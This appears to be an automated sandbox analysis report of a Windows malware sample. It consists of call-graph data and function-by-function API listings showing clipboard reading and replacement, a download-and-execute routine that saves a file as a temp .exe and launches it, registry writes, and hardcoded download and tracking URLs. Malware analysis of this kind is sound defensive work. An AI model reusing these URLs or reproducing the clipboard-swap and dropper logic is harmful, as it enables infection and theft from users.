32994->32996 32998 434794 32995->32998 32999 4347b8 GetLastError 32995->32999 33022 42eae9 20 API calls __dosmaperr 32996->33022 32998->32987 33023 42eab3 20 API calls __dosmaperr 32999->33023 33001->32971 33002->32984 33003->32988 33004->32987 33005->32984 33006->32975 33007->32979 33008->32984 33010 439963 33009->33010 33011 43994e 33009->33011 33016 439988 33010->33016 33026 42ead6 20 API calls __dosmaperr 33010->33026 33024 42ead6 20 API calls __dosmaperr 33011->33024 33013 439953 33025 42eae9 20 API calls __dosmaperr 33013->33025 33016->32994 33017 439993 33027 42eae9 20 API calls __dosmaperr 33017->33027 33018 43995b 33018->32994 33020 43999b 33028 42a5bd 26 API calls _Deallocate 33020->33028 33022->32998 33023->32998 33024->33013 33025->33018 33026->33017 33027->33020 33028->33018 33029 4023ba 33030 402581 PostQuitMessage 33029->33030 33031 4023ce 33029->33031 33035 40257f 33030->33035 33032 4023d5 DefWindowProcW 33031->33032 33033 4023ec 33031->33033 33032->33035 33034 402a14 167 API calls 33033->33034 33033->33035 33034->33035 33036 40fc2b 33037 40fc37 __FrameHandler3::FrameUnwindToState 33036->33037 33065 410018 33037->33065 33039 40fd91 33086 4104f3 4 API calls 2 library calls 33039->33086 33041 40fc3e 33041->33039 33043 40fc68 33041->33043 33042 40fd98 33087 42ffe9 28 API calls _Atexit 33042->33087 33053 40fca7 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 33043->33053 33080 42fd0e 5 API calls __ehhandler$?_RunAndWait@_StructuredTaskCollection@details@Concurrency@@QAG?AW4_TaskCollectionStatus@23@PAV_UnrealizedChore@23@@Z 33043->33080 33045 40fd9e 33088 42ff9b 28 API calls _Atexit 33045->33088 33048 40fc81 33050 40fc87 33048->33050 33081 42fcb2 5 API calls __ehhandler$?_RunAndWait@_StructuredTaskCollection@details@Concurrency@@QAG?AW4_TaskCollectionStatus@23@PAV_UnrealizedChore@23@@Z 33048->33081 33049 40fda6 33052 40fd08 33076 41060d 33052->33076 33053->33052 33082 42a386 167 API calls 4 library calls 33053->33082 33056 40fd0e 
33057 40fd23 33056->33057 33083 410643 GetModuleHandleW 33057->33083 33059 40fd2a 33059->33042 33060 40fd2e 33059->33060 33061 40fd37 33060->33061 33084 42ff8c 28 API calls _Atexit 33060->33084 33085 4101a7 13 API calls 2 library calls 33061->33085 33064 40fd3f 33064->33050 33066 410021 33065->33066 33089 41079b IsProcessorFeaturePresent 33066->33089 33068 41002d 33090 428847 10 API calls 3 library calls 33068->33090 33070 410032 33071 410036 33070->33071 33091 4317c1 33070->33091 33071->33041 33074 41004d 33074->33041 33099 426850 33076->33099 33079 410633 33079->33056 33080->33048 33081->33053 33082->33052 33083->33059 33084->33061 33085->33064 33086->33042 33087->33045 33088->33049 33089->33068 33090->33070 33095 43bbfc 33091->33095 33094 428870 8 API calls 3 library calls 33094->33071 33096 43bc15 33095->33096 33097 40f8f4 __ehhandler$?_RunAndWait@_StructuredTaskCollection@details@Concurrency@@QAG?AW4_TaskCollectionStatus@23@PAV_UnrealizedChore@23@@Z 5 API calls 33096->33097 33098 41003f 33097->33098 33098->33074 33098->33094 33100 410620 GetStartupInfoW 33099->33100 33100->33079 33101 402bcd RegCreateKeyExW 33102 402bfb RegSetValueExW 33101->33102 33103 402c0f 33101->33103 33102->33103 33104 402c14 RegCloseKey 33103->33104 33105 402c1d 33103->33105 33104->33105 33106 4332fe 33107 43330b 33106->33107 33111 433323 33106->33111 33156 42eae9 20 API calls __dosmaperr 33107->33156 33109 433310 33157 42a5bd 26 API calls _Deallocate 33109->33157 33114 43337e 33111->33114 33120 43331b 33111->33120 33158 434ced 21 API calls 2 library calls 33111->33158 33112 432928 __fread_nolock 26 API calls 33115 433396 33112->33115 33114->33112 33126 432e36 33115->33126 33117 43339d 33118 432928 __fread_nolock 26 API calls 33117->33118 33117->33120 33119 4333c9 33118->33119 33119->33120 33121 432928 __fread_nolock 26 API calls 33119->33121 33122 4333d7 33121->33122 33122->33120 33123 432928 __fread_nolock 26 API calls 33122->33123 33124 4333e7 33123->33124 33125 432928 __fread_nolock 
26 API calls 33124->33125 33125->33120 33127 432e42 __FrameHandler3::FrameUnwindToState 33126->33127 33128 432e62 33127->33128 33129 432e4a 33127->33129 33131 432f28 33128->33131 33134 432e9b 33128->33134 33225 42ead6 20 API calls __dosmaperr 33129->33225 33232 42ead6 20 API calls __dosmaperr 33131->33232 33133 432e4f 33226 42eae9 20 API calls __dosmaperr 33133->33226 33137 432eaa 33134->33137 33138 432ebf 33134->33138 33135 432f2d 33233 42eae9 20 API calls __dosmaperr 33135->33233 33227 42ead6 20 API calls __dosmaperr 33137->33227 33159 4396c4 EnterCriticalSection 33138->33159 33142 432eaf 33228 42eae9 20 API calls __dosmaperr 33142->33228 33143 432ec5 33147 432ee1 33143->33147 33148 432ef6 33143->33148 33144 432eb7 33234 42a5bd 26 API calls _Deallocate 33144->33234 33145 432e57 __wsopen_s 33145->33117 33229 42eae9 20 API calls __dosmaperr 33147->33229 33160 432f49 33148->33160 33152 432ef1 33231 432f20 LeaveCriticalSection __wsopen_s 33152->33231 33153 432ee6 33230 42ead6 20 API calls __dosmaperr 33153->33230 33156->33109 33157->33120 33158->33114 33159->33143 33161 432f73 33160->33161 33162 432f5b 33160->33162 33164 4332dd 33161->33164 33169 432fb8 33161->33169 33244 42ead6 20 API calls __dosmaperr 33162->33244 33262 42ead6 20 API calls __dosmaperr 33164->33262 33165 432f60 33245 42eae9 20 API calls __dosmaperr 33165->33245 33168 4332e2 33263 42eae9 20 API calls __dosmaperr 33168->33263 33170 432f68 33169->33170 33172 432fc3 33169->33172 33176 432ff3 33169->33176 33170->33152 33246 42ead6 20 API calls __dosmaperr 33172->33246 33173 432fd0 33264 42a5bd 26 API calls _Deallocate 33173->33264 33175 432fc8 33247 42eae9 20 API calls __dosmaperr 33175->33247 33179 43300c 33176->33179 33180 433032 33176->33180 33181 43304e 33176->33181 33179->33180 33215 433019 33179->33215 33248 42ead6 20 API calls __dosmaperr 33180->33248 33251 4336c7 21 API calls 3 library calls 33181->33251 33184 433037 33249 42eae9 20 API calls __dosmaperr 33184->33249 33185 433065 33188 43348a 
_free 20 API calls 33185->33188 33191 43306e 33188->33191 33189 4331b7 33192 43322d 33189->33192 33196 4331d0 GetConsoleMode 33189->33196 33190 43303e 33250 42a5bd 26 API calls _Deallocate 33190->33250 33194 43348a _free 20 API calls 33191->33194 33195 433231 ReadFile 33192->33195 33197 433075 33194->33197 33198 4332a5 GetLastError 33195->33198 33199 43324b 33195->33199 33196->33192 33200 4331e1 33196->33200 33202 43309a 33197->33202 33203 43307f 33197->33203 33204 4332b2 33198->33204 33205 433209 33198->33205 33199->33198 33206 433222 33199->33206 33200->33195 33201 4331e7 ReadConsoleW 33200->33201 33201->33206 33207 433203 GetLastError 33201->33207 33254 43480e 33202->33254 33252 42eae9 20 API calls __dosmaperr 33203->33252 33260 42eae9 20 API calls __dosmaperr 33204->33260 33221 433049 __fread_nolock 33205->33221 33257 42eab3 20 API calls __dosmaperr 33205->33257 33216 433270 33206->33216 33217 433287 33206->33217 33206->33221 33207->33205 33208 43348a _free 20 API calls 33208->33170 33213 433084 33253 42ead6 20 API calls __dosmaperr 33213->33253 33214 4332b7 33261 42ead6 20 API calls __dosmaperr 33214->33261 33235 43d385 33215->33235 33258 432c65 31 API calls 2 library calls 33216->33258 33217->33221 33222 43329e 33217->33222 33221->33208 33259 432aa5 29 API calls __fread_nolock 33222->33259 33224 4332a3 33224->33221 33225->33133 33226->33145 33227->33142 33228->33144 33229->33153 33230->33152 33231->33145 33232->33135 33233->33144 33234->33145 33236 43d392 33235->33236 33237 43d39f 33235->33237 33265 42eae9 20 API calls __dosmaperr 33236->33265 33240 43d3ab 33237->33240 33266 42eae9 20 API calls __dosmaperr 33237->33266 33239 43d397 33239->33189 33240->33189 33242 43d3cc 33267 42a5bd 26 API calls _Deallocate 33242->33267 33244->33165 33245->33170 33246->33175 33247->33173 33248->33184 33249->33190 33250->33221 33251->33185 33252->33213 33253->33221 33255 434775 __fread_nolock 28 API calls 33254->33255 33256 434824 33255->33256 33256->33215 33257->33221 
33258->33221 33259->33224 33260->33214 33261->33221 33262->33168 33263->33173 33264->33170 33265->33239 33266->33242 33267->33239

                                                        Control-flow Graph

                                                        APIs
                                                        • __EH_prolog3_GS.LIBCMT ref: 004016EA
                                                        • Sleep.KERNEL32(000011EB,0000004C), ref: 004016F4
                                                          • Part of subcall function 0040CC35: _strlen.LIBCMT ref: 0040CC4C
                                                        • OpenClipboard.USER32(00000000), ref: 00401721
                                                        • GetClipboardData.USER32(00000001), ref: 00401731
                                                        • GlobalLock.KERNEL32(00000000), ref: 00401740
                                                        • _strlen.LIBCMT ref: 0040174D
                                                        • _strlen.LIBCMT ref: 0040177C
                                                        • _strlen.LIBCMT ref: 004018C0
                                                        • EmptyClipboard.USER32 ref: 004018D6
                                                        • GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004018E3
                                                        • GlobalLock.KERNEL32(00000000), ref: 00401901
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0040190D
                                                        • SetClipboardData.USER32(00000001,00000000), ref: 00401916
                                                        • GlobalFree.KERNEL32(00000000), ref: 0040191D
                                                        • CloseClipboard.USER32 ref: 00401941
                                                        • Sleep.KERNEL32(000002C7), ref: 0040194C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: ClipboardGlobal$_strlen$DataLockSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
                                                        • String ID: i
                                                        • API String ID: 1583243082-3865851505
                                                        • Opcode ID: 62e215a5972df2954ee8547a1aec1863ca14d0d4ddbfcd9f91bb553889a70fc7
                                                        • Instruction ID: e8206cc808b01b97a457829c5c6b97d93370119956ebdbcfeaa79ca2656f34e0
                                                        • Opcode Fuzzy Hash: 62e215a5972df2954ee8547a1aec1863ca14d0d4ddbfcd9f91bb553889a70fc7
                                                        • Instruction Fuzzy Hash: EE51E431D00344DBE3119BA4ED46BAD7774FF2A306F04523AE805B62B2EB789A85C75D

                                                        Control-flow Graph

                                                        APIs
                                                        • InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402A37
                                                        • InternetOpenUrlW.WININET(00000000,0045D830,00000000,00000000,00000000,00000000), ref: 00402A4D
                                                        • GetTempPathW.KERNEL32(00000105,?), ref: 00402A69
                                                        • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00402A7F
                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00402AB8
                                                        • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00402AF4
                                                        • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00402B11
                                                        • CloseHandle.KERNEL32(00000000), ref: 00402B27
                                                        • ShellExecuteExW.SHELL32(?), ref: 00402B88
                                                        • WaitForSingleObject.KERNEL32(?,00008000), ref: 00402B9D
                                                        • CloseHandle.KERNEL32(?), ref: 00402BA9
                                                        • InternetCloseHandle.WININET(00000000), ref: 00402BB2
                                                        • InternetCloseHandle.WININET(00000000), ref: 00402BB5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Internet$CloseFileHandle$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
                                                        • String ID: .exe$<$ShareScreen
                                                        • API String ID: 3323492106-493228180
                                                        • Opcode ID: cad18285665068766dab7c5d0808057bd44f811c01f48194dcd94531fdcff3d3
                                                        • Instruction ID: d8cef6b8be2db64f00d3760719452557403e9faa7f5bbaccd6a49820079d0072
                                                        • Opcode Fuzzy Hash: cad18285665068766dab7c5d0808057bd44f811c01f48194dcd94531fdcff3d3
                                                        • Instruction Fuzzy Hash: 3E41537190021CAEEB20DF50DD85FEAB7BCFF05745F0080FAA545A2190DEB49E858FA4

                                                        Control-flow Graph

                                                        [Rendered control-flow graph for 432f49 distinguishing executed from not-executed basic blocks; edge list omitted.]
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
                                                        • Instruction ID: d6ce50a492f9084338ba33edda2eca6d731db0489828e8dd55d9f9b17e416b32
                                                        • Opcode Fuzzy Hash: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
                                                        • Instruction Fuzzy Hash: 6EC11370E04245AFDB11DFA9D841BAFBBB0BF0D305F08119AE815A7392C3789A41CB69

                                                        Control-flow Graph

                                                        [Rendered control-flow graph for 43d05c distinguishing executed from not-executed basic blocks; edge list omitted.]
                                                        APIs
                                                          • Part of subcall function 0043CD2A: CreateFileW.KERNEL32(00000000,00000000,?,0043D105,?,?,00000000,?,0043D105,00000000,0000000C), ref: 0043CD47
                                                        • GetLastError.KERNEL32 ref: 0043D170
                                                        • __dosmaperr.LIBCMT ref: 0043D177
                                                        • GetFileType.KERNEL32(00000000), ref: 0043D183
                                                        • GetLastError.KERNEL32 ref: 0043D18D
                                                        • __dosmaperr.LIBCMT ref: 0043D196
                                                        • CloseHandle.KERNEL32(00000000), ref: 0043D1B6
                                                        • CloseHandle.KERNEL32(?), ref: 0043D300
                                                        • GetLastError.KERNEL32 ref: 0043D332
                                                        • __dosmaperr.LIBCMT ref: 0043D339
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                        • String ID:
                                                        • API String ID: 4237864984-0
                                                        • Opcode ID: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
                                                        • Instruction ID: 006e68bf3f1d2291baca7e3f3ccd15ce7d6f583b40adfd1c0386b5d8b5644812
                                                        • Opcode Fuzzy Hash: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
                                                        • Instruction Fuzzy Hash: 70A13632E101049FDF19AF68EC917AE7BA0AF0A324F14115EF805AB3D1D7389D12CB5A

                                                        Control-flow Graph

                                                        APIs
                                                        • InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402C47
                                                          • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
                                                          • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
                                                        • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00402E5F
                                                        • InternetCloseHandle.WININET(00000000), ref: 00402E70
                                                        • InternetCloseHandle.WININET(00000000), ref: 00402E73
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Internet$CloseHandleOpen_wcslen
                                                        • String ID: &cc=DE$ShareScreen$https://post-to-me.com/track_prt.php?sub=
                                                        • API String ID: 3067768807-1501832161
                                                        • Opcode ID: a8bec4743929572fb9f32f475d47f4abd6f055372441a00394d7fc50db865c55
                                                        • Instruction ID: 48789f1b3701ba946f3e6b41f8bd096f2728906552624118b4e60daa7bc135c0
                                                        • Opcode Fuzzy Hash: a8bec4743929572fb9f32f475d47f4abd6f055372441a00394d7fc50db865c55
                                                        • Instruction Fuzzy Hash: 89516095A65344A8E320EFB0BC52F363378EF58712F10643BE518CB2B2E3B59944875E

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
                                                        • String ID: %X@

                                                        Control-flow Graph

                                                        APIs
                                                        • GetLastError.KERNEL32(?,?,?,0042EAEE,00434D9C,?,00431F28,00000001,00000364,?,0042E005,00457910,00000010), ref: 00431F83
                                                        • _free.LIBCMT ref: 00431FB8
                                                        • _free.LIBCMT ref: 00431FDF
                                                        • SetLastError.KERNEL32(00000000), ref: 00431FEC
                                                        • SetLastError.KERNEL32(00000000), ref: 00431FF5
                                                        Similarity
                                                        • API ID: ErrorLast$_free
                                                        • String ID: ('z

                                                        Control-flow Graph

                                                        APIs
                                                        • GetLastError.KERNEL32(00457910,00000010,00000003,00431F7D), ref: 0042DFF3
                                                        • ExitThread.KERNEL32 ref: 0042DFFA
                                                        Similarity
                                                        • API ID: ErrorExitLastThread
                                                        • String ID: 11@$f(@

                                                        Control-flow Graph

                                                        APIs
                                                        • std::_Cnd_initX.LIBCPMT ref: 00405841
                                                        • __Cnd_signal.LIBCPMT ref: 0040584D
                                                        • std::_Cnd_initX.LIBCPMT ref: 00405862
                                                        • __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 00405869
                                                        Similarity
                                                        • API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal

                                                        Control-flow Graph

                                                        APIs
                                                        • _wcslen.LIBCMT ref: 004029AF
                                                        • __fassign.LIBCMT ref: 004029BF
                                                          • Part of subcall function 00402843: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402926
                                                        Similarity
                                                        • API ID: Ios_base_dtor__fassign_wcslenstd::ios_base::_
                                                        • String ID: 4+@

                                                        Control-flow Graph

                                                        APIs
                                                        • CreateThread.KERNEL32(?,?,Function_0002DFE0,00000000,?,?), ref: 0042E17D
                                                        • GetLastError.KERNEL32(?,?,?,?,?,0040CF33,00000000,00000000,?,?,00000000,?), ref: 0042E189
                                                        • __dosmaperr.LIBCMT ref: 0042E190
                                                        Similarity
                                                        • API ID: CreateErrorLastThread__dosmaperr

                                                        Control-flow Graph

                                                        APIs
                                                        • SetFilePointerEx.KERNEL32(00000000,00000000,0040DDFA,00000000,00000002,0040DDFA,00000000,?,?,?,00434824,00000000,00000000,0040DDFA,00000002), ref: 004347AE
                                                        • GetLastError.KERNEL32(?,00434824,00000000,00000000,0040DDFA,00000002,?,0042C181,?,00000000,00000000,00000001,?,0040DDFA,?,0042C236), ref: 004347B8
                                                        • __dosmaperr.LIBCMT ref: 004347BF
                                                        Similarity
                                                        • API ID: ErrorFileLastPointer__dosmaperr

                                                        Control-flow Graph

                                                        APIs
                                                        • RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BEF
                                                        • RegSetValueExW.KERNEL32(?,?,00000000,00000001,?,00000004,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402C07
                                                        • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402C17
                                                        Similarity
                                                        • API ID: CloseCreateValue

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 00431F7E: GetLastError.KERNEL32(?,?,?,0042EAEE,00434D9C,?,00431F28,00000001,00000364,?,0042E005,00457910,00000010), ref: 00431F83
                                                          • Part of subcall function 00431F7E: _free.LIBCMT ref: 00431FB8
                                                          • Part of subcall function 00431F7E: SetLastError.KERNEL32(00000000), ref: 00431FEC
                                                        • ExitThread.KERNEL32 ref: 0042E0A6
                                                        • CloseHandle.KERNEL32(?,?,?,0042E1C6,?,?,0042E03D,00000000), ref: 0042E0CE
                                                        • FreeLibraryAndExitThread.KERNEL32(?,?,?,?,0042E1C6,?,?,0042E03D,00000000), ref: 0042E0E4
                                                        Similarity
                                                        • API ID: ErrorExitLastThread$CloseFreeHandleLibrary_free

                                                        Control-flow Graph

                                                        Similarity
                                                        • API ID: _free
                                                        • String ID: 'C
                                                        APIs
                                                        • DefWindowProcW.USER32(?,?,?,?), ref: 004023E1
                                                        • PostQuitMessage.USER32(00000000), ref: 00402583
                                                        Similarity
                                                        • API ID: MessagePostProcQuitWindow
                                                        APIs
                                                        • Sleep.KERNEL32(0000215D), ref: 00401562
                                                          • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
                                                          • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
                                                        Similarity
                                                        • API ID: _wcslen$Sleep
                                                        • String ID: http://176.113.115.37/ScreenUpdateSync.exe
                                                        Similarity
                                                        • API ID: __fread_nolock
                                                        APIs
                                                        • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402926
                                                        Similarity
                                                        • API ID: Ios_base_dtorstd::ios_base::_
                                                        Similarity
                                                        • API ID: H_prolog3_catch
                                                        Similarity
                                                        • API ID: __wsopen_s
                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00431F28,00000001,00000364,?,0042E005,00457910,00000010), ref: 00434D8B
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0
                                                        • Opcode ID: 480f1ce45d14040ee3ea33e8ab56172a2f2fc49c365442aad9b5ef05e54ba84d
                                                        • Instruction ID: 4bc222232dd1d9c16a782512db5beef15d0f76b15494923fec8dca0d2a195a63
                                                        • Opcode Fuzzy Hash: 480f1ce45d14040ee3ea33e8ab56172a2f2fc49c365442aad9b5ef05e54ba84d
                                                        • Instruction Fuzzy Hash: 10F0BB31600220A69B211B52DC01BAB3B4CAFC5770F545027A804D6190CA28FD01829D
                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(00000000,0040D895,00000000,?,004267BE,00000002,00000000,00000000,00000000,?,0040CD46,0040D895,00000004,00000000,00000000,00000000), ref: 004336F9
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0
                                                        • Opcode ID: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
                                                        • Instruction ID: 8b2e0ce5f68243881f48833c9379da8a786ec54fae66de81054fb87b7da3eb6a
                                                        • Opcode Fuzzy Hash: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
                                                        • Instruction Fuzzy Hash: C9E0E5B1A046207ADA302FA65C06B5B3A48AF497B2F056133FC0592290FF2CDE4081AD
                                                        APIs
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004103E7
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Exception@8Throw
                                                        • String ID:
                                                        • API String ID: 2005118841-0
                                                        • Opcode ID: d3dc0e7b799cf4addcb5e854e1870d6270b50bfba89a80199028074021f20c37
                                                        • Instruction ID: f0ff8e4b9f7cc01ea46f57855d09a1922a3c0907516a33a9cf8cca3f22e82038
                                                        • Opcode Fuzzy Hash: d3dc0e7b799cf4addcb5e854e1870d6270b50bfba89a80199028074021f20c37
                                                        • Instruction Fuzzy Hash: E8E02B3050030D76CB107A65FC1195E33381A00328F90413BBC24A14D1EF78F99D858D
                                                        APIs
                                                        • CreateFileW.KERNEL32(00000000,00000000,?,0043D105,?,?,00000000,?,0043D105,00000000,0000000C), ref: 0043CD47
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
                                                        • Instruction ID: f5cec35e3468c2ebfedbe18043dc9de9c020ce50a8bef62643be49baa2ffa0a5
                                                        • Opcode Fuzzy Hash: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
                                                        • Instruction Fuzzy Hash: DCD06C3200014DBBDF028F84DC06EDA3BAAFB48714F014150BA1856020C732E921AB95
                                                        APIs
                                                        • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0043BAAD,?,00000000), ref: 0043B827
                                                        • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0043BAAD,?,00000000), ref: 0043B850
                                                        • GetACP.KERNEL32(?,?,0043BAAD,?,00000000), ref: 0043B865
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: InfoLocale
                                                        • String ID: ACP$OCP
                                                        • API String ID: 2299586839-711371036
                                                        • Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                        • Instruction ID: 27c07f44f4bcc92ed5b0bc77b7acbdc5106fd624739a874395cd08b17b137cf5
                                                        • Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                        • Instruction Fuzzy Hash: 39210336A00104A6E738AF14C801B9773AAEF58F64F56942BEB0AD7310E736DE01C3D8
                                                        APIs
                                                          • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                          • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                          • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
                                                          • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F59
                                                          • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F66
                                                        • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0043BA6E
                                                        • IsValidCodePage.KERNEL32(00000000), ref: 0043BAC9
                                                        • IsValidLocale.KERNEL32(?,00000001), ref: 0043BAD8
                                                        • GetLocaleInfoW.KERNEL32(?,00001001,004307D5,00000040,?,004308F5,00000055,00000000,?,?,00000055,00000000), ref: 0043BB20
                                                        • GetLocaleInfoW.KERNEL32(?,00001002,00430855,00000040), ref: 0043BB3F
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
                                                        • String ID:
                                                        • API String ID: 2287132625-0
                                                        • Opcode ID: a50431d0c3642f69d47dbab6daefb570278e327c2e745941eee8886a4e92d2d5
                                                        • Instruction ID: 67f71bbb56b82b0218cba6ea78e0e4499e3cf24bce0f2bcc9fbcefe2be7f4072
                                                        • Opcode Fuzzy Hash: a50431d0c3642f69d47dbab6daefb570278e327c2e745941eee8886a4e92d2d5
                                                        • Instruction Fuzzy Hash: DC517371D00609ABDB10EFA5CC45BBF77B8EF4C701F14556BEA40E7250EB789A048BA9
                                                        APIs
                                                          • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                          • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                          • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
                                                        • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,004307DC,?,?,?,?,00430233,?,00000004), ref: 0043B10C
                                                        • _wcschr.LIBVCRUNTIME ref: 0043B19C
                                                        • _wcschr.LIBVCRUNTIME ref: 0043B1AA
                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,004307DC,00000000,004308FC), ref: 0043B24D
                                                        Memory Dump Source
